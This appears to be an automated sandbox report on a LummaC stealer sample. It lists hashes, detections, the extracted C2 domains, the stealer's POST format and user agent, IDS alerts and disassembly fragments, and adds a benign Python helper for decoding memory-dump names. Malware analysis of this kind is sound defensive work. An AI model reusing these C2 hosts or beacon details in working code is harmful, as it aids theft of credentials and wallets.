
Windows Analysis Report
NQbg5Ht2hW.exe

Overview

General Information

Sample name:NQbg5Ht2hW.exe (renamed because the original name is a hash value)
Original sample name:d1137063cca03f3d3079c8c4db839b95.exe
Analysis ID:1579648
MD5:d1137063cca03f3d3079c8c4db839b95
SHA1:2a919e2a2cd02b7b433432602f5d74034fbaffc4
SHA256:f91431bb0d797065ad6803c552059cad9b7d3b9bc695e29b1e666850376945ca
Tags:exeuser-abuse_ch

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • NQbg5Ht2hW.exe (PID: 3440 cmdline: "C:\Users\user\Desktop\NQbg5Ht2hW.exe" MD5: D1137063CCA03F3D3079C8C4DB839B95)
    • WerFault.exe (PID: 6208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 660 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["energyaffai.lat", "grannyejh.lat", "aspecteirs.lat", "discokeyus.lat", "necklacebudi.lat", "rapeflowwj.lat", "sweepyribs.lat", "sustainskelet.lat", "crosshuaht.lat"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
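The two Elastic Windows_Trojan_* hits in the table above fire inside private RWX regions at 0x470000 and 0x710000, that is, on code the sample unpacked at runtime, where generic code-pattern rules from different families can overlap; the family verdict on this page rests on the LummaC configuration and string decryptor, not on those two matches. Reading that off a dump name by hand is error-prone, so the following is an added example (not Joe Sandbox code) that decodes the .sdmp names. The field layout it assumes (process index, dump pass, counter, base address, page protection, an opaque field, region type, trailing counter) is inferred from the names in this report: the protection and type columns hold valid winnt.h constants in every name on the page, while the three fields this example does not understand are kept raw.

```python
"""Decode Joe Sandbox memory-dump (.sdmp) names into the region properties
they encode. Added example, not Joe Sandbox code; the field layout is an
assumption inferred from the dump names in this report.
"""
from dataclasses import dataclass

# winnt.h page-protection values (MEMORY_BASIC_INFORMATION.Protect)
PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# winnt.h region types (MEMORY_BASIC_INFORMATION.Type)
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTE_MASK = 0xF0                      # PAGE_EXECUTE* flags live in the high nibble
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80   # READWRITE, WRITECOPY and their EXECUTE forms


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    dump_pass: int
    base: int
    protect: int
    mem_type: int
    raw_fields: tuple   # the three fields this example does not decode (assumption: opaque)

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    @property
    def is_image(self) -> bool:
        return self.mem_type == 0x1000000


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split 'pidx.pass.counter.base.protect.x.type.y.sdmp' into its parts."""
    if not name.endswith(".sdmp"):
        raise ValueError(f"not an sdmp name: {name}")
    f = name[: -len(".sdmp")].split(".")
    if len(f) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(f)}: {name}")
    return DumpRegion(
        process_index=int(f[0]), dump_pass=int(f[1]),
        base=int(f[3], 16), protect=int(f[4], 16), mem_type=int(f[6], 16),
        raw_fields=(f[2], f[5], f[7]),
    )


def classify(name: str) -> str:
    """One-line verdict on what kind of memory a Yara hit in this dump lives in."""
    r = parse_sdmp_name(name)
    where = (f"0x{r.base:X} {PROTECT.get(r.protect, hex(r.protect))} "
             f"{MEM_TYPE.get(r.mem_type, hex(r.mem_type))}")
    if r.is_image and r.writable and r.executable:
        return f"{where}: mapped PE image remapped RWX (in-place unpacking over the original headers)"
    if not r.is_image and r.writable and r.executable:
        return f"{where}: private RWX region outside any module (unpacked or injected code)"
    if not r.is_image and not r.executable:
        return f"{where}: non-executable private data (heap/stack strings, not code)"
    return f"{where}: ordinary module memory"


if __name__ == "__main__":
    for n in (
        "00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp",
        "00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp",
    ):
        print(classify(n))
```

Run against the names on this page, the two Elastic hits resolve to private RWX memory, the string-decryptor dump at 0x400000 to the original image remapped RWX (which is what "overwrites its own PE header" and "changes PE section rights" describe), and the 0x6D3000 dump holding the Steam page fragments to plain read-write data.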
      No Sigma rule has matched
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-23T07:01:17.451107+0100 | 2058378 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 57293 | 1.1.1.1 | 53 | UDP
      2024-12-23T07:01:17.593871+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49807 | 1.1.1.1 | 53 | UDP
      2024-12-23T07:01:17.733544+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 62547 | 1.1.1.1 | 53 | UDP
      2024-12-23T07:01:17.878639+0100 | 2058370 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 54275 | 1.1.1.1 | 53 | UDP
      2024-12-23T07:01:18.312820+0100 | 2058362 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 57145 | 1.1.1.1 | 53 | UDP
      2024-12-23T07:01:18.706968+0100 | 2058354 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 55219 | 1.1.1.1 | 53 | UDP
      2024-12-23T07:01:18.854285+0100 | 2058376 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 63913 | 1.1.1.1 | 53 | UDP
      2024-12-23T07:01:18.994329+0100 | 2058358 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 62535 | 1.1.1.1 | 53 | UDP
      2024-12-23T07:01:19.136590+0100 | 2058374 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 63618 | 1.1.1.1 | 53 | UDP
      2024-12-23T07:01:21.013322+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49722 | 23.55.153.106 | 443 | TCP
      2024-12-23T07:01:22.036909+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49722 | 23.55.153.106 | 443 | TCP
      2024-12-23T07:01:23.588702+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49733 | 172.67.157.254 | 443 | TCP
      2024-12-23T07:01:24.615424+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49733 | 172.67.157.254 | 443 | TCP
      2024-12-23T07:01:24.615424+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.9 | 49733 | 172.67.157.254 | 443 | TCP
      2024-12-23T07:01:25.426775+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49739 | 172.67.157.254 | 443 | TCP


      AV Detection

      Source: NQbg5Ht2hW.exeAvira: detected
      Source: 0.3.NQbg5Ht2hW.exe.760000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "grannyejh.lat", "aspecteirs.lat", "discokeyus.lat", "necklacebudi.lat", "rapeflowwj.lat", "sweepyribs.lat", "sustainskelet.lat", "crosshuaht.lat"], "Build id": "4h5VfH--"}
      Source: NQbg5Ht2hW.exeVirustotal: Detection: 41%
      Source: NQbg5Ht2hW.exeReversingLabs: Detection: 57%
      Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: NQbg5Ht2hW.exeJoe Sandbox ML: detected
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: rapeflowwj.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: crosshuaht.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: sustainskelet.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: aspecteirs.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: energyaffai.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacebudi.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: discokeyus.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: grannyejh.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: sweepyribs.lat
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
      Source: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4h5VfH--

      Compliance

      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeUnpacked PE file: 0.2.NQbg5Ht2hW.exe.400000.0.unpack
      Source: NQbg5Ht2hW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.9:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49733 version: TLS 1.2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]0_2_0043C767
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]0_2_0040B70C
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp eax0_2_0042984F
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]0_2_00423860
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov edx, ecx0_2_00438810
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh0_2_00438810
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh0_2_00438810
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then test eax, eax0_2_00438810
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0041682D
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]0_2_0041682D
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]0_2_0041682D
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0041D83A
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push C0BFD6CCh0_2_00423086
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push C0BFD6CCh0_2_00423086
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042B170
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]0_2_004179C1
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h0_2_0043B1D0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_0043B1D0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_004291DD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_004291DD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_00405990
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebp, eax0_2_00405990
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, esi0_2_00422190
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_00422190
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_00422190
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CA49
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0042DA53
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]0_2_00416263
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]0_2_00415220
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push esi0_2_00427AD3
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CAD0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_0041B2E0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push ebx0_2_0043CA93
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041CB40
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [esi], cx0_2_0041CB40
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00428B61
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CB11
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042CB22
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_0043F330
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_0040DBD9
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_0040DBD9
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_00417380
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h0_2_0041D380
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp al, 2Eh0_2_00426B95
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00435450
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_00417380
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push 00000000h0_2_00429C2B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_004291DD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_004291DD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_004074F0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_004074F0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0043ECA0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h0_2_004385E0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp eax0_2_004385E0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]0_2_00417DEE
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, eax0_2_00409580
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_00409580
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp dword ptr [0044450Ch]0_2_00418591
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]0_2_00428D93
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then xor edi, edi0_2_0041759F
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]0_2_0041C653
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov edx, ebp0_2_00425E70
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp dword ptr [004455F4h]0_2_00425E30
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, eax0_2_0043AEC0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al0_2_00408F50
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_00408F50
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0042A700
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0041BF14
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]0_2_00419F30
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]0_2_0041E7C0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx eax, word ptr [edx]0_2_004197C2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [edi], dx0_2_004197C2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [esi], cx0_2_004197C2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, ebx0_2_0042DFE9
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp ecx0_2_0040BFFD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov esi, eax0_2_00415799
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, eax0_2_00415799
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0043EFB0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]0_2_00728055
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]0_2_00734031
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov edx, ebp0_2_007360D7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0072C17B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, eax0_2_0074B127
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al0_2_007191B7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_007191B7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]0_2_0072A197
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp ecx0_2_0071C264
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, ebx0_2_0073E250
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0072D230
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [esi], cx0_2_0072D230
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0074F217
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push C0BFD6CCh0_2_007332ED
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, esi0_2_007323F7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_007323F7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_007323F7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0073B3D7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_00739444
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]0_2_00739444
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp dword ptr [004455F4h]0_2_007364DA
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]0_2_007264CA
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]0_2_00725487
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ebx], ax0_2_0072B547
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]0_2_007275E7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h0_2_0072D5E7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_0074F597
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_007456B7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00717757
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00717757
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, eax0_2_007197E7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ebp+00h], ax0_2_007197E7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h0_2_0074887B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]0_2_0072C8BA
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]0_2_0071B973
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0073A967
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]0_2_0074C9CE
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp eax0_2_0074898E
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov edx, ecx0_2_00748A77
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh0_2_00748A77
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh0_2_00748A77
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then test eax, eax0_2_00748A77
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]0_2_0072EA27
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx eax, word ptr [edx]0_2_00729A29
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [edi], dx0_2_00729A29
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [esi], cx0_2_00729A29
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+6D2CC012h]0_2_00724ACD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then jmp eax0_2_00739AB5
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0072DAB8
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00726B2A
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_00715BF7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebp, eax0_2_00715BF7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6D2CC012h]0_2_00724BD2
